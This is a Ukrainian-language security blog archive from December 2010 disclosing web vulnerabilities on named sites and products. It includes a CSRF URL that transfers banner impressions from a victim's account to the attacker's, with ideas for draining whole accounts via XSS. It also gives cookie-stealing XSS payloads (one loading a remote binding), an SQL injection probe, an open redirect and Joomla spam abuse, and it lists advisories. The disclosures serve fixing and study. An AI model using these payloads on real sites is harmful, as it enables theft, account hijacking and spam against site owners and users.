Архів для категорії 'Уразливості'

Business Logic уразливість на banner.kiev.ua

23:50 13.12.2010

В статті Business Logic уразливості через CSRF я писав про Business Logic уразливості, що дозволяють маніпулювати фінансовими даними користувачів. Які можна ініціювати через CSRF атаки.

В якості приклада таких уразливостей наведу Cross-Site Request Forgery уразливість на http://www.banner.kiev.ua, що мені відома ще з 2006 року. Стосовно CSRF дірок на www.banner.kiev.ua я вже писав раніше. Я вже неодноразово писав про уразливості на даному сайті, але більшість з них досі не виправлена адмінами банерної системи, бо вони не слідкують за безпекою власного сайта.

Банери в УБС коштують гроші, тому вони є еквівалентом фінансових одиниць. Бо банери можна монетизувати. З однієї сторони вони можуть знадобитися нападнику, щоб відкручувати рекламу і при цьому не витрачати кошти на купівлю баннерів. А з іншої сторони за них можна купити товари чи сервіси у партнерів УБС, а також їх можна продати на вторинному ринку.

Business Logic Flaw (через CSRF):

Можна викрасти покази користувача через CSRF-атаку. Це можна зробити через POST запит на сторінці http://www.banner.kiev.ua/transfer?x=site_id, або через GET:

http://www.banner.kiev.ua/?a=do_transfer&x=site_id&n=1&to_site_id=your_site_id&format_id=1&value=1000

Цим запитом ви переведете з рахунку сайта site_id жертви на рахунок свого сайта your_site_id 1000 банерів формату 468×60.

Для надійності атаки потрібно знати, що у користувача є необхідна кількість показів, або можна переводити невелику кількість показів (наприклад, 1000). При бажанні можна зробити серверний скрипт, що буде перевіряти стан власного рахунку нападника, і через XSS уразливість - яких море на www.banner.kiev.ua, про що я неодноразово писав - проводити атаки для переведення показів. При цьому зв’язуючись з серверним скриптом нападника, щоб перевірити стан рахунку, і при необхідності корегувати кількість показів для переведення (або через XSS визначити кількість показів на рахунку і одразу забрати всі). Таким чином можна забрати з рахунку користувача всі покази до останнього.

Добірка уразливостей

17:28 13.12.2010

В даній добірці уразливості в веб додатках:

  • Juniper SA Series Cross Site Scripting Issue (деталі)
  • New mapserver packages fix arbitrary code execution (деталі)
  • XSS vulnerability in eazyCMS (деталі)
  • XSS vulnerability in CMSimple (деталі)
  • XSS vulnerability in CMSimple (деталі)
  • Hewlett-Packard OVPI helpmanager Servlet Remote Code Execution Vulnerability (деталі)
  • HP Performance Insight, Remote Execution of Arbitrary Commands (деталі)
  • phpMyAdmin 3.3.5 / 2.11.10 <= Cross Site Scripting (XSS) Vulnerability (деталі)
  • Apache CouchDB Cross Site Request Forgery Attack (деталі)
  • Vulnerability httpdx v1.5.3 (деталі)

XSS та SQL DB Structure Extraction уразливості в Cetera eCommerce

15:01 11.12.2010

01.10.2010

У червні, 07.06.2010, я знайшов нові Cross-Site Scripting та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.12.2010

XSS:

http://site/cms/templates/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/cms/templates/banner.php?bannerId=’

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайт досі так і не виправили уразливості.

Добірка уразливостей

19:28 10.12.2010

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in Cisco Digital Media Manager (деталі)
  • ACollab Multiple Vulnerabilities (деталі)
  • Insecure secure cookie in Tornado (деталі)
  • Cisco Digital Media Player Remote Display Unauthorized Content Injection Vulnerability (деталі)
  • Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability (деталі)
  • XSS vulnerability in pimcore (деталі)
  • XSRF (CSRF) in CMSimple (деталі)
  • XSS vulnerability in CMSimple (деталі)
  • New Shibboleth 1.x packages fix potential code execution (деталі)
  • New xmltooling packages fix potential code execution (деталі)

Уразливості на webmanager-pro.com

15:09 10.12.2010

19.04.2010

У жовтні, 10.10.2009, я знайшов SQL Injection та Redirector уразливості на сайті http://webmanager-pro.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.12.2010

SQL Injection:

http://webmanager-pro.com/c.php?id=1%20and%20version()=5

Redirector:

http://webmanager-pro.com/c.php?id=1&url=http://websecurity.com.ua

Якщо SQL Injection уразливість вже виправлена, то Redirector досі не виправлена.

Нові уразливості в Joomla

16:02 09.12.2010

21.09.2010

Ще в березні, 13.03.2008, я знайшов Insufficient Anti-automation, Abuse of Functionality та Cross-Site Scripting уразливості в Joomla. Уразливості мають місце в компоненті com_mailto, що є стандартним компонентом Joomla. Які я виявив на сайті www.hackerscenter.com. Про що найближчим часом повідомлю розробникам.

Про подібні Insufficient Anti-automation та Abuse of Functionality уразливості я писав в статті Розсилка спаму через сайти та створення спам-ботнетів.

Також раніше я вже писав про уразливості в Joomla.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

09.12.2010

Insufficient Anti-automation:

http://site/component/mailto/?tmpl=component&link=1

На даній сторінці немає захисту від автоматизованих запитів (капчі). В системі використовується таймаут для захисту, але це легко обходиться.

Abuse of Functionality:

Можлива розсилка спаму на довільні емайли (можна підмінити всі важливі поля, а також можна підмінити URL в Joomla до 1.5.7). А з використанням Insufficient Anti-automation уразливості можна автоматизовано розсилати спам з сайта в великих обсягах.

XSS:

POST запит на сторінці http://site/component/mailto/?tmpl=component&link=1
" style="xss:expression(alert(document.cookie))В полях: E-mail to, Sender, Your E-mail, Subject.

Уразливі всі версії Joomla з даним функціоналом (Joomla! 1.5.22 та попередні версії). XSS уразливості відсутні в Joomla! 1.5.21 та 1.5.22, тому вони мають місце в більш ранніх версіях системи.

Розробники Joomla відмовилися виправляти дані уразливості в своїй системі.

Уразливості на online.htmlvalidator.com

15:08 08.12.2010

15.07.2010

В липні, 06.07.2008, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на проекті http://online.htmlvalidator.com (що також доступний на домені http://www.onlinewebcheck.com). Про що найближчим часом сповіщу адміністрацію проекту.

Подібно до уразливостей на www.w3.org, дану Abuse of Functionality уразливість можна використати для проведення атак на інші сайти.

Детальна інформація про уразливості з’явиться пізніше.

08.12.2010

Abuse of Functionality:

http://online.htmlvalidator.com/php/onlinevallite.php?url=http://site

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі). Обмеження на один запит в 5 секунд з одного IP не вирішує задачу.

XSS:

http://online.htmlvalidator.com/php/onlinevallite.php?url=http://htmlvalidator.com/?%22%20style=%22-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml%23xss')

Якщо XSS уразливість вже виправлена, то Abuse of Functionality та IAA уразливості досі не виправлені.

Уразливість на rapidlibrary.com

18:09 07.12.2010

17.04.2010

У жовтні, 09.10.2009, я знайшов Cross-Site Scripting уразливість на проекті http://rapidlibrary.com (пошуковець файлів на файлообміннику RapidShare). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

07.12.2010

XSS:

Дана уразливість досі не виправлена.

XSS уразливості на fileshare.in.ua

15:09 04.12.2010

14.04.2010

У жовтні, 05.10.2009, я знайшов Cross-Site Scripting уразливості (persistent та reflected) на проекті http://fileshare.in.ua (файлообмінник та хостінг файлів). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на fileshare.in.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.12.2010

XSS:

Це persistent XSS. При написанні відповіді на сторінці тікета (http://fileshare.in.ua/mailhistory.aspx?tid=70de0308f9ef11a5) або написанні повідомлення на сторінці http://fileshare.in.ua/mail.aspx, в тікеті спрацьовує XSS код (в полі Сообщение). Атака можлива доки тікет відкритий.

XSS:

Це приклад атаки для Mozilla та Firefox до 3.0. Для інших браузерів використовується відповідний атакуюший код.

Дані уразливості досі не виправлені.

Добірка уразливостей

15:23 03.12.2010

В даній добірці уразливості в веб додатках:

  • Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow (деталі)
  • Easy FTP Server 1.7.0.2 Remote BoF (деталі)
  • Local File Inclusion in CMS Source (деталі)
  • SQL injection vulnerability in CMS Source (деталі)
  • Backdoor and Vulnerabilities in Xerox WorkCentre Printers Web Interface (деталі)
  • XSS vulnerability in CMS Source (деталі)
  • XSS vulnerability in eazyCMS (деталі)
  • Security Notice for CA eHealth Performance Manager (деталі)
  • XSS vulnerability in eazyCMS (деталі)
  • Apple Airport Wireless Products: Promiscuous FTP PORT Allowed in FTP Proxy Provides Security Bypass (деталі)